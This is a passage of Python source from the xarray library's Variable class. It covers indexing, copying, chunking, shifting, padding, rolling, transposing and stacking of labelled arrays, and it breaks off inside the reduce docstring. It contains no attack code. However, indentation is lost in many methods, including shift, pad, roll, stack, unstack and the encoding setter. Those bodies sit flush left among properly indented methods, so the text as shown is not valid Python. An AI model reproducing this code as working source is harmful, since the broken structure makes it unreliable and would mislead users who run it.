        # key can be mapped as an OuterIndexer.
        if all(not isinstance(k, Variable) for k in key):
            return self._broadcast_indexes_outer(key)
        # If all key is 1-dimensional and there are no duplicate labels,
        # key can be mapped as an OuterIndexer.
        # (a mix of labeled and unlabeled 1-d indexers is still "outer" as
        # long as each one targets a distinct output dimension)
        dims = []
        for k, d in zip(key, self.dims):
            if isinstance(k, Variable):
                if len(k.dims) > 1:
                    return self._broadcast_indexes_vectorized(key)
                dims.append(k.dims[0])
            elif not isinstance(k, integer_types):
                dims.append(d)
        if len(set(dims)) == len(dims):
            return self._broadcast_indexes_outer(key)
        return self._broadcast_indexes_vectorized(key)
def _broadcast_indexes_basic(self, key):
dims = tuple(
dim for k, dim in zip(key, self.dims) if not isinstance(k, integer_types)
)
return dims, BasicIndexer(key), None
    def _validate_indexers(self, key):
        """Make sanity checks"""
        # Checks only the non-basic (array-like) entries of an already
        # expanded key; raises IndexError on anything unusable.
        for dim, k in zip(self.dims, key):
            if not isinstance(k, BASIC_INDEXING_TYPES):
                if not isinstance(k, Variable):
                    k = np.asarray(k)
                    # unlabeled arrays must be 1-d to be usable as indexers
                    if k.ndim > 1:
                        raise IndexError(
                            "Unlabeled multi-dimensional array cannot be "
                            "used for indexing: {}".format(k)
                        )
                if k.dtype.kind == "b":
                    if self.shape[self.get_axis_num(dim)] != len(k):
                        raise IndexError(
                            "Boolean array size {:d} is used to index array "
                            "with shape {:s}.".format(len(k), str(self.shape))
                        )
                    # reachable only for labeled (Variable) indexers; unlabeled
                    # ones with ndim > 1 were rejected above
                    if k.ndim > 1:
                        raise IndexError(
                            "{}-dimensional boolean indexing is "
                            "not supported. ".format(k.ndim)
                        )
                    if getattr(k, "dims", (dim,)) != (dim,):
                        raise IndexError(
                            "Boolean indexer should be unlabeled or on the "
                            "same dimension to the indexed array. Indexer is "
                            "on {:s} but the target dimension is {:s}.".format(
                                str(k.dims), dim
                            )
                        )
    def _broadcast_indexes_outer(self, key):
        # Build an OuterIndexer: each non-integer indexer contributes one
        # output dimension (a labeled 1-d Variable contributes its own dim
        # name, anything else keeps the original dim name).
        dims = tuple(
            k.dims[0] if isinstance(k, Variable) else dim
            for k, dim in zip(key, self.dims)
            if not isinstance(k, integer_types)
        )
        new_key = []
        for k in key:
            if isinstance(k, Variable):
                k = k.data
            if not isinstance(k, BASIC_INDEXING_TYPES):
                k = np.asarray(k)
                if k.size == 0:
                    # Slice by empty list; numpy could not infer the dtype
                    k = k.astype(int)
                elif k.dtype.kind == "b":
                    # boolean masks become integer position arrays
                    (k,) = np.nonzero(k)
            new_key.append(k)
        return dims, OuterIndexer(tuple(new_key)), None
def _nonzero(self):
"""Equivalent numpy's nonzero but returns a tuple of Varibles."""
# TODO we should replace dask's native nonzero
# after https://github.com/dask/dask/issues/1076 is implemented.
nonzeros = np.nonzero(self.data)
return tuple(Variable((dim), nz) for nz, dim in zip(nonzeros, self.dims))
    def _broadcast_indexes_vectorized(self, key):
        # Build a VectorizedIndexer: all array-like indexers are broadcast
        # against each other; slices are either materialized (when they share
        # a dim with an array indexer) or deferred via a post-index reorder.
        variables = []
        out_dims_set = OrderedSet()
        for dim, value in zip(self.dims, key):
            if isinstance(value, slice):
                out_dims_set.add(dim)
            else:
                variable = (
                    value
                    if isinstance(value, Variable)
                    else as_variable(value, name=dim)
                )
                if variable.dtype.kind == "b":  # boolean indexing case
                    (variable,) = variable._nonzero()
                variables.append(variable)
                out_dims_set.update(variable.dims)
        variable_dims = set()
        for variable in variables:
            variable_dims.update(variable.dims)
        slices = []
        for i, (dim, value) in enumerate(zip(self.dims, key)):
            if isinstance(value, slice):
                if dim in variable_dims:
                    # We only convert slice objects to variables if they share
                    # a dimension with at least one other variable. Otherwise,
                    # we can equivalently leave them as slices and transpose
                    # the result. This is significantly faster/more efficient
                    # for most array backends.
                    values = np.arange(*value.indices(self.sizes[dim]))
                    variables.insert(i - len(slices), Variable((dim,), values))
                else:
                    slices.append((i, value))
        try:
            variables = _broadcast_compat_variables(*variables)
        except ValueError:
            raise IndexError(f"Dimensions of indexers mismatch: {key}")
        out_key = [variable.data for variable in variables]
        out_dims = tuple(out_dims_set)
        slice_positions = set()
        for i, value in slices:
            # re-insert kept slices at their original positions and remember
            # where their dims land in the output for the final reorder
            out_key.insert(i, value)
            new_position = out_dims.index(self.dims[i])
            slice_positions.add(new_position)
        if slice_positions:
            new_order = [i for i in range(len(out_dims)) if i not in slice_positions]
        else:
            new_order = None
        return out_dims, VectorizedIndexer(tuple(out_key)), new_order
    def __getitem__(self: VariableType, key) -> VariableType:
        """Return a new Variable object whose contents are consistent with
        getting the provided key from the underlying data.

        NB. __getitem__ and __setitem__ implement xarray-style indexing,
        where if keys are unlabeled arrays, we index the array orthogonally
        with them. If keys are labeled array (such as Variables), they are
        broadcasted with our usual scheme and then the array is indexed with
        the broadcasted key, like numpy's fancy indexing.

        If you really want to do indexing like `x[x > 0]`, manipulate the numpy
        array `x.values` directly.
        """
        dims, indexer, new_order = self._broadcast_indexes(key)
        data = as_indexable(self._data)[indexer]
        if new_order:
            # deferred-slice dims need to be moved to their output positions
            data = np.moveaxis(data, range(len(new_order)), new_order)
        return self._finalize_indexing_result(dims, data)
    def _finalize_indexing_result(self: VariableType, dims, data) -> VariableType:
        """Used by IndexVariable to return IndexVariable objects when possible."""
        # Base implementation: just rewrap; subclasses may override.
        return self._replace(dims=dims, data=data)
    def _getitem_with_mask(self, key, fill_value=dtypes.NA):
        """Index this Variable with -1 remapped to fill_value.

        Like __getitem__, but positions where the (integer) indexer is -1
        produce ``fill_value`` instead of the last element along the axis.
        """
        # TODO(shoyer): expose this method in public API somewhere (isel?) and
        # use it for reindex.
        # TODO(shoyer): add a sanity check that all other integers are
        # non-negative
        # TODO(shoyer): add an optimization, remapping -1 to an adjacent value
        # that is actually indexed rather than mapping it to the last value
        # along each axis.
        if fill_value is dtypes.NA:
            fill_value = dtypes.get_fill_value(self.dtype)
        dims, indexer, new_order = self._broadcast_indexes(key)
        if self.size:
            if is_duck_dask_array(self._data):
                # dask's indexing is faster this way; also vindex does not
                # support negative indices yet:
                # https://github.com/dask/dask/pull/2967
                actual_indexer = indexing.posify_mask_indexer(indexer)
            else:
                actual_indexer = indexer
            data = as_indexable(self._data)[actual_indexer]
            mask = indexing.create_mask(indexer, self.shape, data)
            # we need to invert the mask in order to pass data first. This helps
            # pint to choose the correct unit
            # TODO: revert after https://github.com/hgrecco/pint/issues/1019 is fixed
            data = duck_array_ops.where(np.logical_not(mask), data, fill_value)
        else:
            # array cannot be indexed along dimensions of size 0, so just
            # build the mask directly instead.
            mask = indexing.create_mask(indexer, self.shape)
            data = np.broadcast_to(fill_value, getattr(mask, "shape", ()))
        if new_order:
            # deferred-slice dims need to be moved to their output positions
            data = duck_array_ops.moveaxis(data, range(len(new_order)), new_order)
        return self._finalize_indexing_result(dims, data)
    def __setitem__(self, key, value):
        """__setitem__ is overloaded to access the underlying numpy values with
        orthogonal indexing.

        See __getitem__ for more details.
        """
        dims, index_tuple, new_order = self._broadcast_indexes(key)
        if not isinstance(value, Variable):
            value = as_compatible_data(value)
            if value.ndim > len(dims):
                raise ValueError(
                    f"shape mismatch: value array of shape {value.shape} could not be "
                    f"broadcast to indexing result with {len(dims)} dimensions"
                )
            if value.ndim == 0:
                value = Variable((), value)
            else:
                # align the value's trailing dims with the indexing result's dims
                value = Variable(dims[-value.ndim :], value)
        # broadcast to become assignable
        value = value.set_dims(dims).data
        if new_order:
            # undo the deferred-slice reorder so the value matches the raw
            # (pre-moveaxis) layout of the vectorized-indexed data
            value = duck_array_ops.asarray(value)
            value = value[(len(dims) - value.ndim) * (np.newaxis,) + (Ellipsis,)]
            value = np.moveaxis(value, new_order, range(len(new_order)))
        indexable = as_indexable(self._data)
        indexable[index_tuple] = value
    @property
    def attrs(self) -> Dict[Hashable, Any]:
        """Dictionary of local attributes on this variable."""
        # lazily materialize so a fresh Variable doesn't carry an empty dict
        if self._attrs is None:
            self._attrs = {}
        return self._attrs
    @attrs.setter
    def attrs(self, value: Mapping[Hashable, Any]) -> None:
        # copy into a plain dict so external mutation can't leak in
        self._attrs = dict(value)
    @property
    def encoding(self):
        """Dictionary of encodings on this variable."""
        # lazily materialize, mirroring the attrs property
        if self._encoding is None:
            self._encoding = {}
        return self._encoding
@encoding.setter
def encoding(self, value):
try:
self._encoding = dict(value)
except ValueError:
raise ValueError("encoding must be castable to a dictionary")
    def copy(self, deep=True, data=None):
        """Returns a copy of this object.

        If `deep=True`, the data array is loaded into memory and copied onto
        the new object. Dimensions, attributes and encodings are always copied.

        Use `data` to create a new object with the same structure as
        original but entirely new data.

        Parameters
        ----------
        deep : bool, optional
            Whether the data array is loaded into memory and copied onto
            the new object. Default is True.
        data : array_like, optional
            Data to use in the new object. Must have same shape as original.
            When `data` is used, `deep` is ignored.

        Returns
        -------
        object : Variable
            New object with dimensions, attributes, encodings, and optionally
            data copied from original.

        Examples
        --------
        Shallow copy versus deep copy

        >>> var = xr.Variable(data=[1, 2, 3], dims="x")
        >>> var.copy()
        <xarray.Variable (x: 3)>
        array([1, 2, 3])
        >>> var_0 = var.copy(deep=False)
        >>> var_0[0] = 7
        >>> var_0
        <xarray.Variable (x: 3)>
        array([7, 2, 3])
        >>> var
        <xarray.Variable (x: 3)>
        array([7, 2, 3])

        Changing the data using the ``data`` argument maintains the
        structure of the original object, but with the new data. Original
        object is unaffected.

        >>> var.copy(data=[0.1, 0.2, 0.3])
        <xarray.Variable (x: 3)>
        array([0.1, 0.2, 0.3])
        >>> var
        <xarray.Variable (x: 3)>
        array([7, 2, 3])

        See Also
        --------
        pandas.DataFrame.copy
        """
        if data is None:
            data = self._data
            if isinstance(data, indexing.MemoryCachedArray):
                # don't share caching between copies
                data = indexing.MemoryCachedArray(data.array)
            if deep:
                data = copy.deepcopy(data)
        else:
            # user-supplied data: validate shape, never deep-copy (`deep` is
            # documented as ignored in this branch)
            data = as_compatible_data(data)
            if self.shape != data.shape:
                raise ValueError(
                    "Data shape {} must match shape of object {}".format(
                        data.shape, self.shape
                    )
                )
        # note:
        # dims is already an immutable tuple
        # attributes and encoding will be copied when the new Array is created
        return self._replace(data=data)
    def _replace(
        self: VariableType,
        dims=_default,
        data=_default,
        attrs=_default,
        encoding=_default,
    ) -> VariableType:
        """Fastpath constructor: build a new instance of the same type,
        reusing (shallow copies of) the current fields for any argument
        left at the ``_default`` sentinel."""
        if dims is _default:
            dims = copy.copy(self._dims)
        if data is _default:
            data = copy.copy(self.data)
        if attrs is _default:
            attrs = copy.copy(self._attrs)
        if encoding is _default:
            encoding = copy.copy(self._encoding)
        return type(self)(dims, data, attrs, encoding, fastpath=True)
    def __copy__(self):
        # copy.copy(var) -> shallow copy, consistent with .copy(deep=False)
        return self.copy(deep=False)
    def __deepcopy__(self, memo=None):
        # memo does nothing but is required for compatibility with
        # copy.deepcopy
        return self.copy(deep=True)
# mutable objects should not be hashable
# https://github.com/python/mypy/issues/4266
__hash__ = None # type: ignore[assignment]
    @property
    def chunks(self):
        """Block dimensions for this array's data or None if it's not a dask
        array.
        """
        # non-dask data has no .chunks attribute, hence the getattr default
        return getattr(self._data, "chunks", None)
_array_counter = itertools.count()
    def chunk(self, chunks={}, name=None, lock=False):
        """Coerce this array's data into a dask arrays with the given chunks.

        If this variable is a non-dask array, it will be converted to dask
        array. If it's a dask array, it will be rechunked to the given chunk
        sizes.

        If chunks are not provided for one or more dimensions, chunk
        sizes along that dimension will not be updated; non-dask arrays will be
        converted into dask arrays with a single block.

        Parameters
        ----------
        chunks : int, tuple or dict, optional
            Chunk sizes along each dimension, e.g., ``5``, ``(5, 5)`` or
            ``{'x': 5, 'y': 5}``.
        name : str, optional
            Used to generate the name for this array in the internal dask
            graph. Does not need to be unique.
        lock : optional
            Passed on to :py:func:`dask.array.from_array`, if the array is not
            already as dask array.

        Returns
        -------
        chunked : xarray.Variable
        """
        import dask.array as da

        # NOTE: the mutable default `chunks={}` is safe here because it is
        # only ever read or rebound, never mutated in place.
        if chunks is None:
            warnings.warn(
                "None value for 'chunks' is deprecated. "
                "It will raise an error in the future. Use instead '{}'",
                category=FutureWarning,
            )
            chunks = {}

        if utils.is_dict_like(chunks):
            # translate dim names to axis numbers
            chunks = {self.get_axis_num(dim): chunk for dim, chunk in chunks.items()}

        data = self._data
        if is_duck_dask_array(data):
            data = data.rechunk(chunks)
        else:
            if isinstance(data, indexing.ExplicitlyIndexed):
                # Unambiguously handle array storage backends (like NetCDF4 and h5py)
                # that can't handle general array indexing. For example, in netCDF4 you
                # can do "outer" indexing along two dimensions independent, which works
                # differently from how NumPy handles it.
                # da.from_array works by using lazy indexing with a tuple of slices.
                # Using OuterIndexer is a pragmatic choice: dask does not yet handle
                # different indexing types in an explicit way:
                # https://github.com/dask/dask/issues/2883
                data = indexing.ImplicitToExplicitIndexingAdapter(
                    data, indexing.OuterIndexer
                )
                # All of our lazily loaded backend array classes should use NumPy
                # array operations.
                kwargs = {"meta": np.ndarray}
            else:
                kwargs = {}

            if utils.is_dict_like(chunks):
                # fill unspecified axes with their full size (single block)
                chunks = tuple(chunks.get(n, s) for n, s in enumerate(self.shape))

            data = da.from_array(data, chunks, name=name, lock=lock, **kwargs)

        return self._replace(data=data)
    def _as_sparse(self, sparse_format=_default, fill_value=dtypes.NA):
        """
        use sparse-array as backend.
        """
        import sparse

        # TODO: what to do if dask-backended?
        if fill_value is dtypes.NA:
            # promote so NA has a representable fill value in the dtype
            dtype, fill_value = dtypes.maybe_promote(self.dtype)
        else:
            dtype = dtypes.result_type(self.dtype, fill_value)

        if sparse_format is _default:
            sparse_format = "coo"
        try:
            # e.g. "coo" -> sparse.as_coo
            as_sparse = getattr(sparse, f"as_{sparse_format.lower()}")
        except AttributeError:
            raise ValueError(f"{sparse_format} is not a valid sparse format")

        data = as_sparse(self.data.astype(dtype), fill_value=fill_value)
        return self._replace(data=data)
def _to_dense(self):
"""
Change backend from sparse to np.array
"""
if hasattr(self._data, "todense"):
return self._replace(data=self._data.todense())
return self.copy(deep=False)
    def isel(
        self: VariableType,
        indexers: Mapping[Hashable, Any] = None,
        missing_dims: str = "raise",
        **indexers_kwargs: Any,
    ) -> VariableType:
        """Return a new array indexed along the specified dimension(s).

        Parameters
        ----------
        **indexers : {dim: indexer, ...}
            Keyword arguments with names matching dimensions and values given
            by integers, slice objects or arrays.
        missing_dims : {"raise", "warn", "ignore"}, default: "raise"
            What to do if dimensions that should be selected from are not present in the
            DataArray:
            - "raise": raise an exception
            - "warn": raise a warning, and ignore the missing dimensions
            - "ignore": ignore the missing dimensions

        Returns
        -------
        obj : Array object
            A new Array with the selected data and dimensions. In general,
            the new variable's data will be a view of this variable's data,
            unless numpy fancy indexing was triggered by using an array
            indexer, in which case the data will be a copy.
        """
        indexers = either_dict_or_kwargs(indexers, indexers_kwargs, "isel")
        indexers = drop_dims_from_indexers(indexers, self.dims, missing_dims)

        # dims without an indexer keep everything (full slice)
        key = tuple(indexers.get(dim, slice(None)) for dim in self.dims)
        return self[key]
    def squeeze(self, dim=None):
        """Return a new object with squeezed data.

        Parameters
        ----------
        dim : None or str or tuple of str, optional
            Selects a subset of the length one dimensions. If a dimension is
            selected with length greater than one, an error is raised. If
            None, all length one dimensions are squeezed.

        Returns
        -------
        squeezed : same type as caller
            This object, but with all or a subset of the dimensions of
            length 1 removed.

        See Also
        --------
        numpy.squeeze
        """
        dims = common.get_squeeze_dims(self, dim)
        # selecting index 0 along a length-1 dim drops that dim
        return self.isel({d: 0 for d in dims})
    def _shift_one_dim(self, dim, count, fill_value=dtypes.NA):
        """Shift data along a single dimension by ``count`` positions,
        padding the vacated end with ``fill_value``."""
        axis = self.get_axis_num(dim)

        if count > 0:
            keep = slice(None, -count)
        elif count < 0:
            keep = slice(-count, None)
        else:
            keep = slice(None)

        trimmed_data = self[(slice(None),) * axis + (keep,)].data

        if fill_value is dtypes.NA:
            # promote so NA has a representable fill value in the dtype
            dtype, fill_value = dtypes.maybe_promote(self.dtype)
        else:
            dtype = self.dtype

        # cap the pad width at the dim size for |count| > length shifts
        width = min(abs(count), self.shape[axis])
        dim_pad = (width, 0) if count >= 0 else (0, width)
        pads = [(0, 0) if d != dim else dim_pad for d in self.dims]

        data = duck_array_ops.pad(
            trimmed_data.astype(dtype),
            pads,
            mode="constant",
            constant_values=fill_value,
        )

        if is_duck_dask_array(data):
            # chunked data should come out with the same chunks; this makes
            # it feasible to combine shifted and unshifted data
            # TODO: remove this once dask.array automatically aligns chunks
            data = data.rechunk(self.data.chunks)

        return self._replace(data=data)
def shift(self, shifts=None, fill_value=dtypes.NA, **shifts_kwargs):
"""
Return a new Variable with shifted data.
Parameters
----------
shifts : mapping of the form {dim: offset}
Integer offset to shift along each of the given dimensions.
Positive offsets shift to the right; negative offsets shift to the
left.
fill_value : scalar, optional
Value to use for newly missing values
**shifts_kwargs
The keyword arguments form of ``shifts``.
One of shifts or shifts_kwargs must be provided.
Returns
-------
shifted : Variable
Variable with the same dimensions and attributes but shifted data.
"""
shifts = either_dict_or_kwargs(shifts, shifts_kwargs, "shift")
result = self
for dim, count in shifts.items():
result = result._shift_one_dim(dim, count, fill_value=fill_value)
return result
def _pad_options_dim_to_index(
self,
pad_option: Mapping[Hashable, Union[int, Tuple[int, int]]],
fill_with_shape=False,
):
if fill_with_shape:
return [
(n, n) if d not in pad_option else pad_option[d]
for d, n in zip(self.dims, self.data.shape)
]
return [(0, 0) if d not in pad_option else pad_option[d] for d in self.dims]
def pad(
self,
pad_width: Mapping[Hashable, Union[int, Tuple[int, int]]] = None,
mode: str = "constant",
stat_length: Union[
int, Tuple[int, int], Mapping[Hashable, Tuple[int, int]]
] = None,
constant_values: Union[
int, Tuple[int, int], Mapping[Hashable, Tuple[int, int]]
] = None,
end_values: Union[
int, Tuple[int, int], Mapping[Hashable, Tuple[int, int]]
] = None,
reflect_type: str = None,
**pad_width_kwargs: Any,
):
"""
Return a new Variable with padded data.
Parameters
----------
pad_width : mapping of hashable to tuple of int
Mapping with the form of {dim: (pad_before, pad_after)}
describing the number of values padded along each dimension.
{dim: pad} is a shortcut for pad_before = pad_after = pad
mode : str, default: "constant"
See numpy / Dask docs
stat_length : int, tuple or mapping of hashable to tuple
Used in 'maximum', 'mean', 'median', and 'minimum'. Number of
values at edge of each axis used to calculate the statistic value.
constant_values : scalar, tuple or mapping of hashable to tuple
Used in 'constant'. The values to set the padded values for each
axis.
end_values : scalar, tuple or mapping of hashable to tuple
Used in 'linear_ramp'. The values used for the ending value of the
linear_ramp and that will form the edge of the padded array.
reflect_type : {"even", "odd"}, optional
Used in "reflect", and "symmetric". The "even" style is the
default with an unaltered reflection around the edge value. For
the "odd" style, the extended part of the array is created by
subtracting the reflected values from two times the edge value.
**pad_width_kwargs
One of pad_width or pad_width_kwargs must be provided.
Returns
-------
padded : Variable
Variable with the same dimensions and attributes but padded data.
"""
pad_width = either_dict_or_kwargs(pad_width, pad_width_kwargs, "pad")
# change default behaviour of pad with mode constant
if mode == "constant" and (
constant_values is None or constant_values is dtypes.NA
):
dtype, constant_values = dtypes.maybe_promote(self.dtype)
else:
dtype = self.dtype
# create pad_options_kwargs, numpy requires only relevant kwargs to be nonempty
if isinstance(stat_length, dict):
stat_length = self._pad_options_dim_to_index(
stat_length, fill_with_shape=True
)
if isinstance(constant_values, dict):
constant_values = self._pad_options_dim_to_index(constant_values)
if isinstance(end_values, dict):
end_values = self._pad_options_dim_to_index(end_values)
# workaround for bug in Dask's default value of stat_length https://github.com/dask/dask/issues/5303
if stat_length is None and mode in ["maximum", "mean", "median", "minimum"]:
stat_length = [(n, n) for n in self.data.shape] # type: ignore[assignment]
# change integer values to a tuple of two of those values and change pad_width to index
for k, v in pad_width.items():
if isinstance(v, numbers.Number):
pad_width[k] = (v, v)
pad_width_by_index = self._pad_options_dim_to_index(pad_width)
# create pad_options_kwargs, numpy/dask requires only relevant kwargs to be nonempty
pad_option_kwargs = {}
if stat_length is not None:
pad_option_kwargs["stat_length"] = stat_length
if constant_values is not None:
pad_option_kwargs["constant_values"] = constant_values
if end_values is not None:
pad_option_kwargs["end_values"] = end_values
if reflect_type is not None:
pad_option_kwargs["reflect_type"] = reflect_type # type: ignore[assignment]
array = duck_array_ops.pad(
self.data.astype(dtype, copy=False),
pad_width_by_index,
mode=mode,
**pad_option_kwargs,
)
return type(self)(self.dims, array)
    def _roll_one_dim(self, dim, count):
        """Roll data along a single dimension by ``count`` positions,
        wrapping values around (no fill)."""
        axis = self.get_axis_num(dim)

        # normalize so 0 <= count < length; rolls by a multiple of the
        # length are a no-op
        count %= self.shape[axis]
        if count != 0:
            # concatenate the wrapped tail in front of the head
            indices = [slice(-count, None), slice(None, -count)]
        else:
            indices = [slice(None)]

        arrays = [self[(slice(None),) * axis + (idx,)].data for idx in indices]

        data = duck_array_ops.concatenate(arrays, axis)

        if is_duck_dask_array(data):
            # chunked data should come out with the same chunks; this makes
            # it feasible to combine shifted and unshifted data
            # TODO: remove this once dask.array automatically aligns chunks
            data = data.rechunk(self.data.chunks)

        return self._replace(data=data)
def roll(self, shifts=None, **shifts_kwargs):
"""
Return a new Variable with rolld data.
Parameters
----------
shifts : mapping of hashable to int
Integer offset to roll along each of the given dimensions.
Positive offsets roll to the right; negative offsets roll to the
left.
**shifts_kwargs
The keyword arguments form of ``shifts``.
One of shifts or shifts_kwargs must be provided.
Returns
-------
shifted : Variable
Variable with the same dimensions and attributes but rolled data.
"""
shifts = either_dict_or_kwargs(shifts, shifts_kwargs, "roll")
result = self
for dim, count in shifts.items():
result = result._roll_one_dim(dim, count)
return result
    def transpose(self, *dims) -> "Variable":
        """Return a new Variable object with transposed dimensions.

        Parameters
        ----------
        *dims : str, optional
            By default, reverse the dimensions. Otherwise, reorder the
            dimensions to this order.

        Returns
        -------
        transposed : Variable
            The returned object has transposed data and dimensions with the
            same attributes as the original.

        Notes
        -----
        This operation returns a view of this variable's data. It is
        lazy for dask-backed Variables but not for numpy-backed Variables.

        See Also
        --------
        numpy.transpose
        """
        if len(dims) == 0:
            dims = self.dims[::-1]
        # resolve an Ellipsis placeholder against the full dim list
        dims = tuple(infix_dims(dims, self.dims))

        if len(dims) < 2 or dims == self.dims:
            # no need to transpose if only one dimension
            # or dims are in same order
            return self.copy(deep=False)

        axes = self.get_axis_num(dims)
        data = as_indexable(self._data).transpose(axes)
        return self._replace(dims=dims, data=data)
    @property
    def T(self) -> "Variable":
        """Transpose with all dimensions reversed, like numpy's ``.T``."""
        return self.transpose()
    def set_dims(self, dims, shape=None):
        """Return a new variable with given set of dimensions.
        This method might be used to attach new dimension(s) to variable.

        When possible, this operation does not copy this variable's data.

        Parameters
        ----------
        dims : str or sequence of str or dict
            Dimensions to include on the new variable. If a dict, values are
            used to provide the sizes of new dimensions; otherwise, new
            dimensions are inserted with length 1.
        shape : sequence of int, optional
            Sizes for the dimensions in ``dims``; when given, new dimensions
            are broadcast to these sizes. Defaults to the dict values when
            ``dims`` is dict-like.

        Returns
        -------
        Variable
        """
        if isinstance(dims, str):
            dims = [dims]

        if shape is None and utils.is_dict_like(dims):
            shape = dims.values()

        missing_dims = set(self.dims) - set(dims)
        if missing_dims:
            raise ValueError(
                f"new dimensions {dims!r} must be a superset of "
                f"existing dimensions {self.dims!r}"
            )

        self_dims = set(self.dims)
        # new dims go in front; the final transpose restores the requested order
        expanded_dims = tuple(d for d in dims if d not in self_dims) + self.dims

        if self.dims == expanded_dims:
            # don't use broadcast_to unless necessary so the result remains
            # writeable if possible
            expanded_data = self.data
        elif shape is not None:
            dims_map = dict(zip(dims, shape))
            tmp_shape = tuple(dims_map[d] for d in expanded_dims)
            expanded_data = duck_array_ops.broadcast_to(self.data, tmp_shape)
        else:
            # insert leading length-1 axes for each new dimension
            expanded_data = self.data[(None,) * (len(expanded_dims) - self.ndim)]

        expanded_var = Variable(
            expanded_dims, expanded_data, self._attrs, self._encoding, fastpath=True
        )
        return expanded_var.transpose(*dims)
    def _stack_once(self, dims: List[Hashable], new_dim: Hashable):
        """Collapse the given existing dimensions into a single new trailing
        dimension ``new_dim`` via a transpose + reshape."""
        if not set(dims) <= set(self.dims):
            raise ValueError(f"invalid existing dimensions: {dims}")

        if new_dim in self.dims:
            raise ValueError(
                "cannot create a new dimension with the same "
                "name as an existing dimension"
            )

        if len(dims) == 0:
            # don't stack
            return self.copy(deep=False)

        # move the stacked dims to the end so a C-order reshape merges them
        other_dims = [d for d in self.dims if d not in dims]
        dim_order = other_dims + list(dims)
        reordered = self.transpose(*dim_order)

        new_shape = reordered.shape[: len(other_dims)] + (-1,)
        new_data = reordered.data.reshape(new_shape)
        new_dims = reordered.dims[: len(other_dims)] + (new_dim,)

        return Variable(new_dims, new_data, self._attrs, self._encoding, fastpath=True)
def stack(self, dimensions=None, **dimensions_kwargs):
"""
Stack any number of existing dimensions into a single new dimension.
New dimensions will be added at the end, and the order of the data
along each new dimension will be in contiguous (C) order.
Parameters
----------
dimensions : mapping of hashable to tuple of hashable
Mapping of form new_name=(dim1, dim2, ...) describing the
names of new dimensions, and the existing dimensions that
they replace.
**dimensions_kwargs
The keyword arguments form of ``dimensions``.
One of dimensions or dimensions_kwargs must be provided.
Returns
-------
stacked : Variable
Variable with the same attributes but stacked data.
See Also
--------
Variable.unstack
"""
dimensions = either_dict_or_kwargs(dimensions, dimensions_kwargs, "stack")
result = self
for new_dim, dims in dimensions.items():
result = result._stack_once(dims, new_dim)
return result
    def _unstack_once_full(
        self, dims: Mapping[Hashable, int], old_dim: Hashable
    ) -> "Variable":
        """
        Unstacks the variable without needing an index.

        Unlike `_unstack_once`, this function requires the existing dimension to
        contain the full product of the new dimensions.
        """
        new_dim_names = tuple(dims.keys())
        new_dim_sizes = tuple(dims.values())

        if old_dim not in self.dims:
            raise ValueError(f"invalid existing dimension: {old_dim}")

        if set(new_dim_names).intersection(self.dims):
            raise ValueError(
                "cannot create a new dimension with the same "
                "name as an existing dimension"
            )

        if np.prod(new_dim_sizes) != self.sizes[old_dim]:
            raise ValueError(
                "the product of the new dimension sizes must "
                "equal the size of the old dimension"
            )

        # move the unstacked dim to the end so a C-order reshape splits it
        other_dims = [d for d in self.dims if d != old_dim]
        dim_order = other_dims + [old_dim]
        reordered = self.transpose(*dim_order)

        new_shape = reordered.shape[: len(other_dims)] + new_dim_sizes
        new_data = reordered.data.reshape(new_shape)
        new_dims = reordered.dims[: len(other_dims)] + new_dim_names

        return Variable(new_dims, new_data, self._attrs, self._encoding, fastpath=True)
    def _unstack_once(
        self,
        index: pd.MultiIndex,
        dim: Hashable,
        fill_value=dtypes.NA,
    ) -> "Variable":
        """
        Unstacks this variable given an index to unstack and the name of the
        dimension to which the index refers.

        Positions absent from ``index`` are filled with ``fill_value``
        (promoting the dtype if necessary when fill_value is NA).
        """
        reordered = self.transpose(..., dim)

        new_dim_sizes = [lev.size for lev in index.levels]
        new_dim_names = index.names
        indexer = index.codes

        # Potentially we could replace `len(other_dims)` with just `-1`
        other_dims = [d for d in self.dims if d != dim]
        new_shape = tuple(list(reordered.shape[: len(other_dims)]) + new_dim_sizes)
        new_dims = reordered.dims[: len(other_dims)] + new_dim_names

        if fill_value is dtypes.NA:
            # only promote the dtype when some positions are actually missing
            is_missing_values = np.prod(new_shape) > np.prod(self.shape)
            if is_missing_values:
                dtype, fill_value = dtypes.maybe_promote(self.dtype)
            else:
                dtype = self.dtype
                fill_value = dtypes.get_fill_value(dtype)
        else:
            dtype = self.dtype

        data = np.full_like(
            self.data,
            fill_value=fill_value,
            shape=new_shape,
            dtype=dtype,
        )

        # Indexer is a list of lists of locations. Each list is the locations
        # on the new dimension. This is robust to the data being sparse; in that
        # case the destinations will be NaN / zero.
        # sparse doesn't support item assignment,
        # https://github.com/pydata/sparse/issues/114
        data[(..., *indexer)] = reordered

        return self._replace(dims=new_dims, data=data)
def unstack(self, dimensions=None, **dimensions_kwargs):
"""
Unstack an existing dimension into multiple new dimensions.
New dimensions will be added at the end, and the order of the data
along each new dimension will be in contiguous (C) order.
Note that unlike ``DataArray.unstack`` and ``Dataset.unstack``, this
method requires the existing dimension to contain the full product of
the new dimensions.
Parameters
----------
dimensions : mapping of hashable to mapping of hashable to int
Mapping of the form old_dim={dim1: size1, ...} describing the
names of existing dimensions, and the new dimensions and sizes
that they map to.
**dimensions_kwargs
The keyword arguments form of ``dimensions``.
One of dimensions or dimensions_kwargs must be provided.
Returns
-------
unstacked : Variable
Variable with the same attributes but unstacked data.
See Also
--------
Variable.stack
DataArray.unstack
Dataset.unstack
"""
dimensions = either_dict_or_kwargs(dimensions, dimensions_kwargs, "unstack")
result = self
for old_dim, dims in dimensions.items():
result = result._unstack_once_full(dims, old_dim)
return result
def fillna(self, value):
return ops.fillna(self, value)
def where(self, cond, other=dtypes.NA):
return ops.where_method(self, cond, other)
def clip(self, min=None, max=None):
"""
Return an array whose values are limited to ``[min, max]``.
At least one of max or min must be given.
Refer to `numpy.clip` for full documentation.
See Also
--------
numpy.clip : equivalent function
"""
from .computation import apply_ufunc
return apply_ufunc(np.clip, self, min, max, dask="allowed")
    def reduce(
        self,
        func,
        dim=None,
        axis=None,
        keep_attrs=None,
        keepdims=False,
        **kwargs,
    ):
        """Reduce this array by applying `func` along some dimension(s).

        Parameters
        ----------
        func : callable
            Function which can be called in the form
            `func(x, axis=axis, **kwargs)` to return the result of reducing an
            np.ndarray over an integer valued axis.
        dim : str or sequence of str, optional
            Dimension(s) over which to apply `func`.
        axis : int or sequence of int, optional
            Axis(es) over which to apply `func`. Only one of the 'dim'
            and 'axis' arguments can be supplied. If neither are supplied, then
            the reduction is calculated over the flattened array (by calling
            `func(x)` without an axis argument).
        keep_attrs : bool, optional
